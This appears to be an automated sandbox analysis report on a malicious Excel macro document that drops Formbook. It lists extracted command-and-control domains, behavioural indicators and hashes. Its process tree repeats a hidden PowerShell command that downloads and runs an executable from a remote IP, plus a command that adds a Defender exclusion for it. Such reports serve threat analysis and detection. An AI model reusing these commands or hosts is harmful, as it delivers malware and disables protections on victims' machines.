Analysis
-
max time kernel
149s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
04-09-2024 14:38
Behavioral task
behavioral1
Sample
SOAPO8829921199.xlsm
Resource
win7-20240708-en
General
-
Target
SOAPO8829921199.xlsm
-
Size
165KB
-
MD5
c0a096ce5928bce34fffd5874093f235
-
SHA1
971a8fbd841e42dcab84288205525b89301825c2
-
SHA256
54929de588e37191bfc6dd0bf4f3edc1fca58c67af0e6bc7b1bd15a66d8c1bf0
-
SHA512
9d7c5aaf2fe546422ff3379169909929ec50f6eebba27d527178066c943ea2973a72c7501202b9502c8ccd646dfe6b49c1194c34b8f9822404bf1fad6971eb61
-
SSDEEP
3072:BJNjJehd8PiRjkctohQQRBK0BvyixmZ49ke+jJLNkYa6+Rc64d:BJN06iactuRbB6M9+1GYaza64d
Malware Config
Extracted
formbook
4.1
t20u
ecurity-jobs-ne-00989.bond
ameuniverse.shop
sychologist-therapy-33393.bond
refabricated-homes-33099.bond
urltheswirl.live
reengroce.online
cknowledgewizardinter14.sbs
excasino.club
931.bet
ilehog.net
olorandbrush.net
jpbbmr.biz
vtwenty20pt.top
nline-advertising-76521.bond
eavenresidence.net
arodyna.shop
orsi-di-massaggio.bond
est-kids-toys-near-me.today
47-nurse-76671.bond
u-suppr.top
onstruction-jobs-49170.bond
yewxop.xyz
ruisjob.today
nlinecourses92.today
91599.club
oluoav.xyz
ashiono.shop
panish-classes-65082.bond
uikfox.buzz
adoggeriacamadepiedra.online
nvestment-services-64552.bond
8s6wj.digital
exy-baccarat66.net
itchenremodelingideas.online
risis-tech.net
enior-dating-24515.bond
epatitis-treatment-85780.bond
etrition.shop
iautomationmarket.net
nfluencer-marketing-41712.bond
eststock.website
amphunt.online
enddid.shop
rogramddd.shop
5g2q9.buzz
aconstructionjob.bond
asedzos.fun
aktikkvtoto04.info
entley-paaae.buzz
d36d.shop
tatikkdb.app
eedsunited.live
fzf.xxx
hrcbmggvm.top
-web-apple02.buzz
ibotech.net
ackrelaxer.shop
ggdonor-bd-en-fb-va.today
400725ieulrju709.top
ind-one-bedroom-apartment.today
addiehub.zone
hairulaming.asia
eirobox.online
ofs2is5ap.buzz
twow.shop
Signatures
-
Process spawned unexpected child process 5 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4532 1652 powershell.exe 83 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4004 1652 powershell.exe 83 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4368 1652 powershell.exe 83 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4380 1652 powershell.exe 83 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4408 1652 powershell.exe 83 -
Formbook payload 2 IoCs
resource yara_rule behavioral2/memory/2984-84-0x0000000000400000-0x000000000042F000-memory.dmp formbook behavioral2/memory/3188-132-0x0000000000A30000-0x0000000000A5F000-memory.dmp formbook -
Blocklisted process makes network request 5 IoCs
flow pid Process 53 4532 powershell.exe 55 4004 powershell.exe 56 4368 powershell.exe 57 4380 powershell.exe 62 4408 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 8 IoCs
Run Powershell and hide display window.
pid Process 4004 powershell.exe 4368 powershell.exe 4380 powershell.exe 4408 powershell.exe 4532 powershell.exe 4876 powershell.exe 3416 powershell.exe 60 powershell.exe -
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Control Panel\International\Geo\Nation gvpttllrilhpexthxdz.exe Key value queried \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Control Panel\International\Geo\Nation gvpttllrilhpexthxdz.exe Key value queried \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Control Panel\International\Geo\Nation gvpttllrilhpexthxdz.exe -
Executes dropped EXE 8 IoCs
pid Process 1660 gvpttllrilhpexthxdz.exe 1492 gvpttllrilhpexthxdz.exe 2984 gvpttllrilhpexthxdz.exe 3328 gvpttllrilhpexthxdz.exe 3900 gvpttllrilhpexthxdz.exe 1852 gvpttllrilhpexthxdz.exe 4516 gvpttllrilhpexthxdz.exe 2788 gvpttllrilhpexthxdz.exe -
Suspicious use of SetThreadContext 7 IoCs
description pid Process procid_target PID 1660 set thread context of 2984 1660 gvpttllrilhpexthxdz.exe 104 PID 2984 set thread context of 3424 2984 gvpttllrilhpexthxdz.exe 55 PID 3188 set thread context of 3424 3188 wlanext.exe 55 PID 1492 set thread context of 3900 1492 gvpttllrilhpexthxdz.exe 114 PID 3900 set thread context of 3424 3900 gvpttllrilhpexthxdz.exe 55 PID 3328 set thread context of 4516 3328 gvpttllrilhpexthxdz.exe 121 PID 4516 set thread context of 3424 4516 gvpttllrilhpexthxdz.exe 55 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 11 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language gvpttllrilhpexthxdz.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language gvpttllrilhpexthxdz.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language gvpttllrilhpexthxdz.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wlanext.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msdt.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language gvpttllrilhpexthxdz.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language gvpttllrilhpexthxdz.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString EXCEL.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU EXCEL.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 1924 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 44 IoCs
pid Process 4532 powershell.exe 4532 powershell.exe 4004 powershell.exe 4004 powershell.exe 2984 gvpttllrilhpexthxdz.exe 2984 gvpttllrilhpexthxdz.exe 2984 gvpttllrilhpexthxdz.exe 2984 gvpttllrilhpexthxdz.exe 4876 powershell.exe 4876 powershell.exe 3188 wlanext.exe 3188 wlanext.exe 3188 wlanext.exe 3188 wlanext.exe 4368 powershell.exe 4368 powershell.exe 3900 gvpttllrilhpexthxdz.exe 3900 gvpttllrilhpexthxdz.exe 3900 gvpttllrilhpexthxdz.exe 3900 gvpttllrilhpexthxdz.exe 3416 powershell.exe 3416 powershell.exe 4772 msdt.exe 4772 msdt.exe 3188 wlanext.exe 3188 wlanext.exe 3188 wlanext.exe 3188 wlanext.exe 4380 powershell.exe 4380 powershell.exe 4516 gvpttllrilhpexthxdz.exe 4516 gvpttllrilhpexthxdz.exe 4516 gvpttllrilhpexthxdz.exe 4516 gvpttllrilhpexthxdz.exe 60 powershell.exe 60 powershell.exe 3188 wlanext.exe 3188 wlanext.exe 3092 help.exe 3092 help.exe 3188 wlanext.exe 3188 wlanext.exe 4408 powershell.exe 4408 powershell.exe -
Suspicious behavior: MapViewOfSection 11 IoCs
pid Process 2984 gvpttllrilhpexthxdz.exe 2984 gvpttllrilhpexthxdz.exe 2984 gvpttllrilhpexthxdz.exe 3188 wlanext.exe 3188 wlanext.exe 3900 gvpttllrilhpexthxdz.exe 3900 gvpttllrilhpexthxdz.exe 3900 gvpttllrilhpexthxdz.exe 4516 gvpttllrilhpexthxdz.exe 4516 gvpttllrilhpexthxdz.exe 4516 gvpttllrilhpexthxdz.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 4532 powershell.exe Token: SeDebugPrivilege 4004 powershell.exe Token: SeDebugPrivilege 2984 gvpttllrilhpexthxdz.exe Token: SeDebugPrivilege 4876 powershell.exe Token: SeShutdownPrivilege 3424 Explorer.EXE Token: SeCreatePagefilePrivilege 3424 Explorer.EXE Token: SeShutdownPrivilege 3424 Explorer.EXE Token: SeCreatePagefilePrivilege 3424 Explorer.EXE Token: SeShutdownPrivilege 3424 Explorer.EXE Token: SeCreatePagefilePrivilege 3424 Explorer.EXE Token: SeDebugPrivilege 3188 wlanext.exe Token: SeShutdownPrivilege 3424 Explorer.EXE Token: SeCreatePagefilePrivilege 3424 Explorer.EXE Token: SeShutdownPrivilege 3424 Explorer.EXE Token: SeCreatePagefilePrivilege 3424 Explorer.EXE Token: SeShutdownPrivilege 3424 Explorer.EXE Token: SeCreatePagefilePrivilege 3424 Explorer.EXE Token: SeDebugPrivilege 4368 powershell.exe Token: SeShutdownPrivilege 3424 Explorer.EXE Token: SeCreatePagefilePrivilege 3424 Explorer.EXE Token: SeShutdownPrivilege 3424 Explorer.EXE Token: SeCreatePagefilePrivilege 3424 Explorer.EXE Token: SeShutdownPrivilege 3424 Explorer.EXE Token: SeCreatePagefilePrivilege 3424 Explorer.EXE Token: SeShutdownPrivilege 3424 Explorer.EXE Token: SeCreatePagefilePrivilege 3424 Explorer.EXE Token: SeShutdownPrivilege 3424 Explorer.EXE Token: SeCreatePagefilePrivilege 3424 Explorer.EXE Token: SeShutdownPrivilege 3424 Explorer.EXE Token: SeCreatePagefilePrivilege 3424 Explorer.EXE Token: SeDebugPrivilege 3900 gvpttllrilhpexthxdz.exe Token: SeDebugPrivilege 3416 powershell.exe Token: SeShutdownPrivilege 3424 Explorer.EXE Token: SeCreatePagefilePrivilege 3424 Explorer.EXE Token: SeShutdownPrivilege 3424 Explorer.EXE Token: SeCreatePagefilePrivilege 3424 Explorer.EXE Token: SeShutdownPrivilege 3424 Explorer.EXE Token: SeCreatePagefilePrivilege 3424 Explorer.EXE Token: SeDebugPrivilege 4772 msdt.exe Token: SeShutdownPrivilege 3424 Explorer.EXE Token: SeCreatePagefilePrivilege 3424 Explorer.EXE Token: SeShutdownPrivilege 3424 Explorer.EXE Token: SeCreatePagefilePrivilege 3424 Explorer.EXE Token: SeShutdownPrivilege 3424 Explorer.EXE Token: SeCreatePagefilePrivilege 3424 Explorer.EXE Token: SeDebugPrivilege 4380 powershell.exe Token: SeShutdownPrivilege 3424 Explorer.EXE Token: SeCreatePagefilePrivilege 3424 Explorer.EXE Token: SeShutdownPrivilege 3424 Explorer.EXE Token: SeCreatePagefilePrivilege 3424 Explorer.EXE Token: SeShutdownPrivilege 3424 Explorer.EXE Token: SeCreatePagefilePrivilege 3424 Explorer.EXE Token: SeShutdownPrivilege 3424 Explorer.EXE Token: SeCreatePagefilePrivilege 3424 Explorer.EXE Token: SeShutdownPrivilege 3424 Explorer.EXE Token: SeCreatePagefilePrivilege 3424 Explorer.EXE Token: SeShutdownPrivilege 3424 Explorer.EXE Token: SeCreatePagefilePrivilege 3424 Explorer.EXE Token: SeDebugPrivilege 4516 gvpttllrilhpexthxdz.exe Token: SeDebugPrivilege 60 powershell.exe Token: SeShutdownPrivilege 3424 Explorer.EXE Token: SeCreatePagefilePrivilege 3424 Explorer.EXE Token: SeShutdownPrivilege 3424 Explorer.EXE Token: SeCreatePagefilePrivilege 3424 Explorer.EXE -
Suspicious use of FindShellTrayWindow 2 IoCs
pid Process 1924 EXCEL.EXE 1924 EXCEL.EXE -
Suspicious use of SetWindowsHookEx 22 IoCs
pid Process 1924 EXCEL.EXE 1924 EXCEL.EXE 1924 EXCEL.EXE 1924 EXCEL.EXE 1924 EXCEL.EXE 1924 EXCEL.EXE 1924 EXCEL.EXE 1924 EXCEL.EXE 1924 EXCEL.EXE 1924 EXCEL.EXE 1924 EXCEL.EXE 1924 EXCEL.EXE 1924 EXCEL.EXE 1924 EXCEL.EXE 1924 EXCEL.EXE 1924 EXCEL.EXE 1924 EXCEL.EXE 1924 EXCEL.EXE 1924 EXCEL.EXE 1924 EXCEL.EXE 1924 EXCEL.EXE 1924 EXCEL.EXE -
Suspicious use of UnmapMainImage 1 IoCs
pid Process 3424 Explorer.EXE -
Suspicious use of WriteProcessMemory 56 IoCs
description pid Process procid_target PID 1924 wrote to memory of 3596 1924 EXCEL.EXE 85 PID 1924 wrote to memory of 3596 1924 EXCEL.EXE 85 PID 4532 wrote to memory of 1660 4532 powershell.exe 99 PID 4532 wrote to memory of 1660 4532 powershell.exe 99 PID 4532 wrote to memory of 1660 4532 powershell.exe 99 PID 4004 wrote to memory of 1492 4004 powershell.exe 102 PID 4004 wrote to memory of 1492 4004 powershell.exe 102 PID 4004 wrote to memory of 1492 4004 powershell.exe 102 PID 1660 wrote to memory of 4876 1660 gvpttllrilhpexthxdz.exe 103 PID 1660 wrote to memory of 4876 1660 gvpttllrilhpexthxdz.exe 103 PID 1660 wrote to memory of 4876 1660 gvpttllrilhpexthxdz.exe 103 PID 1660 wrote to memory of 2984 1660 gvpttllrilhpexthxdz.exe 104 PID 1660 wrote to memory of 2984 1660 gvpttllrilhpexthxdz.exe 104 PID 1660 wrote to memory of 2984 1660 gvpttllrilhpexthxdz.exe 104 PID 1660 wrote to memory of 2984 1660 gvpttllrilhpexthxdz.exe 104 PID 1660 wrote to memory of 2984 1660 gvpttllrilhpexthxdz.exe 104 PID 1660 wrote to memory of 2984 1660 gvpttllrilhpexthxdz.exe 104 PID 3424 wrote to memory of 3188 3424 Explorer.EXE 106 PID 3424 wrote to memory of 3188 3424 Explorer.EXE 106 PID 3424 wrote to memory of 3188 3424 Explorer.EXE 106 PID 3188 wrote to memory of 436 3188 wlanext.exe 107 PID 3188 wrote to memory of 436 3188 wlanext.exe 107 PID 3188 wrote to memory of 436 3188 wlanext.exe 107 PID 4368 wrote to memory of 3328 4368 powershell.exe 111 PID 4368 wrote to memory of 3328 4368 powershell.exe 111 PID 4368 wrote to memory of 3328 4368 powershell.exe 111 PID 1492 wrote to memory of 3416 1492 gvpttllrilhpexthxdz.exe 112 PID 1492 wrote to memory of 3416 1492 gvpttllrilhpexthxdz.exe 112 PID 1492 wrote to memory of 3416 1492 gvpttllrilhpexthxdz.exe 112 PID 1492 wrote to memory of 3900 1492 gvpttllrilhpexthxdz.exe 114 PID 1492 wrote to memory of 3900 1492 gvpttllrilhpexthxdz.exe 114 PID 1492 wrote to memory of 3900 1492 gvpttllrilhpexthxdz.exe 114 PID 1492 wrote to memory of 3900 1492 gvpttllrilhpexthxdz.exe 114 PID 1492 wrote to memory of 3900 1492 gvpttllrilhpexthxdz.exe 114 PID 1492 wrote to memory of 3900 1492 gvpttllrilhpexthxdz.exe 114 PID 3424 wrote to memory of 4772 3424 Explorer.EXE 115 PID 3424 wrote to memory of 4772 3424 Explorer.EXE 115 PID 3424 wrote to memory of 4772 3424 Explorer.EXE 115 PID 4380 wrote to memory of 1852 4380 powershell.exe 118 PID 4380 wrote to memory of 1852 4380 powershell.exe 118 PID 4380 wrote to memory of 1852 4380 powershell.exe 118 PID 3328 wrote to memory of 60 3328 gvpttllrilhpexthxdz.exe 119 PID 3328 wrote to memory of 60 3328 gvpttllrilhpexthxdz.exe 119 PID 3328 wrote to memory of 60 3328 gvpttllrilhpexthxdz.exe 119 PID 3328 wrote to memory of 4516 3328 gvpttllrilhpexthxdz.exe 121 PID 3328 wrote to memory of 4516 3328 gvpttllrilhpexthxdz.exe 121 PID 3328 wrote to memory of 4516 3328 gvpttllrilhpexthxdz.exe 121 PID 3328 wrote to memory of 4516 3328 gvpttllrilhpexthxdz.exe 121 PID 3328 wrote to memory of 4516 3328 gvpttllrilhpexthxdz.exe 121 PID 3328 wrote to memory of 4516 3328 gvpttllrilhpexthxdz.exe 121 PID 3424 wrote to memory of 3092 3424 Explorer.EXE 122 PID 3424 wrote to memory of 3092 3424 Explorer.EXE 122 PID 3424 wrote to memory of 3092 3424 Explorer.EXE 122 PID 4408 wrote to memory of 2788 4408 powershell.exe 125 PID 4408 wrote to memory of 2788 4408 powershell.exe 125 PID 4408 wrote to memory of 2788 4408 powershell.exe 125
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of UnmapMainImage
- Suspicious use of WriteProcessMemory
PID:3424 -
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\SOAPO8829921199.xlsm"2⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1924 -
C:\Windows\splwow64.exeC:\Windows\splwow64.exe 122883⤵PID:3596
-
-
-
C:\Windows\SysWOW64\wlanext.exe"C:\Windows\SysWOW64\wlanext.exe"2⤵
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3188 -
C:\Windows\SysWOW64\cmd.exe/c del "C:\Users\Public\gvpttllrilhpexthxdz.exe"3⤵
- System Location Discovery: System Language Discovery
PID:436
-
-
-
C:\Windows\SysWOW64\msdt.exe"C:\Windows\SysWOW64\msdt.exe"2⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4772
-
-
C:\Windows\SysWOW64\help.exe"C:\Windows\SysWOW64\help.exe"2⤵
- Suspicious behavior: EnumeratesProcesses
PID:3092
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k PrintWorkflow -s PrintWorkflowUserSvc1⤵PID:548
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command " & { iwr http://45.137.22.181/localsecurrity.exe -OutFile C:\Users\Public\gvpttllrilhpexthxdz.exe}; & {Start-Process -FilePath "C:\Users\Public\gvpttllrilhpexthxdz.exe"}"1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4532 -
C:\Users\Public\gvpttllrilhpexthxdz.exe"C:\Users\Public\gvpttllrilhpexthxdz.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1660 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Public\gvpttllrilhpexthxdz.exe"3⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4876
-
-
C:\Users\Public\gvpttllrilhpexthxdz.exe"C:\Users\Public\gvpttllrilhpexthxdz.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
PID:2984
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command " & { iwr http://45.137.22.181/localsecurrity.exe -OutFile C:\Users\Public\gvpttllrilhpexthxdz.exe}; & {Start-Process -FilePath "C:\Users\Public\gvpttllrilhpexthxdz.exe"}"1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4004 -
C:\Users\Public\gvpttllrilhpexthxdz.exe"C:\Users\Public\gvpttllrilhpexthxdz.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1492 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Public\gvpttllrilhpexthxdz.exe"3⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3416
-
-
C:\Users\Public\gvpttllrilhpexthxdz.exe"C:\Users\Public\gvpttllrilhpexthxdz.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
PID:3900
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command " & { iwr http://45.137.22.181/localsecurrity.exe -OutFile C:\Users\Public\gvpttllrilhpexthxdz.exe}; & {Start-Process -FilePath "C:\Users\Public\gvpttllrilhpexthxdz.exe"}"1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4368 -
C:\Users\Public\gvpttllrilhpexthxdz.exe"C:\Users\Public\gvpttllrilhpexthxdz.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3328 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Public\gvpttllrilhpexthxdz.exe"3⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:60
-
-
C:\Users\Public\gvpttllrilhpexthxdz.exe"C:\Users\Public\gvpttllrilhpexthxdz.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
PID:4516
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command " & { iwr http://45.137.22.181/localsecurrity.exe -OutFile C:\Users\Public\gvpttllrilhpexthxdz.exe}; & {Start-Process -FilePath "C:\Users\Public\gvpttllrilhpexthxdz.exe"}"1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4380 -
C:\Users\Public\gvpttllrilhpexthxdz.exe"C:\Users\Public\gvpttllrilhpexthxdz.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1852
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command " & { iwr http://45.137.22.181/localsecurrity.exe -OutFile C:\Users\Public\gvpttllrilhpexthxdz.exe}; & {Start-Process -FilePath "C:\Users\Public\gvpttllrilhpexthxdz.exe"}"1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4408 -
C:\Users\Public\gvpttllrilhpexthxdz.exe"C:\Users\Public\gvpttllrilhpexthxdz.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2788
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD5556084f2c6d459c116a69d6fedcc4105
SHA1633e89b9a1e77942d822d14de6708430a3944dbc
SHA25688cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8
SHA5120f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e
-
Filesize
1KB
MD58ec831f3e3a3f77e4a7b9cd32b48384c
SHA1d83f09fd87c5bd86e045873c231c14836e76a05c
SHA2567667e538030e3f8ce2886e47a01af24cb0ea70528b1e821c5d8832c5076cb982
SHA51226bffa2406b66368bd412bf25869a792631455645992cdcade2dbc13a2e56fb546414a6a9223b94c96c38d89187add6678d4779a88b38b0c9e36be8527b213c3
-
Filesize
2KB
MD5968cb9309758126772781b83adb8a28f
SHA18da30e71accf186b2ba11da1797cf67f8f78b47c
SHA25692099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a
SHA5124bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3
-
Filesize
1KB
MD5ef99d6f22775dc9249d2657cdc8a7ae8
SHA1dd0225436ce908de98f68f10835116a195ec29df
SHA2562970bb420cbeedbd0eb284a8c5bd2e54013b6c1bea5e495669bb52f44bf00f14
SHA512b652a46f0866f21fa96666ac547fddd99d23813f7b4757eb9604dd68ae49230d46e85dbc9ca4062ea194fc20cfd7e340cf0324bf2fa0c7d00f74b5c30b41810e
-
Filesize
18KB
MD5e85a2d699fbb1b027466408573af7e61
SHA14d308696ffbb9443ab3761d19a3bb843c2f0f78f
SHA2565767898e869de136988ac2b02fcaca8d1dbbe483cedaa1a2a40159c9703aaaed
SHA5120908684501bb473bda23a1947838c46cd0ed0fa4ea72bc0b595601c8d6c4b2ac214eec21b5d80c00a50e08e9c09f21df402666cd28d8f2dfad75d3251807bb2d
-
Filesize
1KB
MD5fbbe616c6563865d0f776ed058aec2c4
SHA168a910fa8fad4b21e8cdc0c0263dbef6cadcc268
SHA256dd1a56d9f57e412134fb8601e43727e06edde336dba81888c6f79828e6c5c0d7
SHA5126422316dddc9efccb04d1b84f38014e4d565d228f6d7e0e799154ccec8dde7c795270cbb1d37e4a5630f3b61b326cb72771e76ad7dcde0d3e6bfcbe9d8802969
-
Filesize
18KB
MD52b743a9777c31fef609b23924a4fd6e3
SHA14ce2dd3060353affafdb0592b009e69179a8ee84
SHA2567bd18dce2aa54dfb0e92d21318ee5b522a4de242bacb775b33269863e0bbe677
SHA512143c9a495e84b51c76e3ad1f733f2e8f3c3ce2e464f7df241c6ed58c4b78fda94e843a13a2b7b8a2ed0696782646ea95f03c04a54fa95b58d4f367e97177d1ff
-
Filesize
18KB
MD52fe98c0ce21600be76184ae8a3d42147
SHA178b876186c687e0c566447912432bc605b0fc9c5
SHA256b97bc5ffd28b4723f95e14eeb579951cfe19e29bd38c471a0810550a36c0ae4e
SHA512477f5dc67b7f8431e008b704a4bfea73febda0ed7be1c9ea3431e49e4ad080a700a4a11b17e4c0b69eb17d3243a5dfcf9025565cdc45d9dca1689e06de05c56b
-
Filesize
1KB
MD570595b5937369a2592a524db67e208d3
SHA1d989b934d9388104189f365694e794835aa6f52f
SHA256be09b93a020e2e86a0b3c7c3f3d3e2c45f888944b1036df738385ede16f595c8
SHA512edb412886187a2740eb7e284b16838bdd9f011aba1f4581f1fed25a86cdfe9b2ab4df863edeb3db6b072805439d57b10f3e0a1f2daabe1ee56db275ad2ad61e5
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
607KB
MD50854c389689bb92cf7463197df6dd98e
SHA1d636129847d4c92a8b6aa15ab7a75ee857c7c9b8
SHA2562779dab5ffc62d1641b00c1093798d2a56ad348168f4d973c2d92ececf0df400
SHA5122a96a18dfa551a551ce4ac4cbefe0c4a4522284d43ae285218157042d99e294441126eb9bcaa6edd6f6875930237a77ac2a8a0fa6370f1e90a8aa701235fe322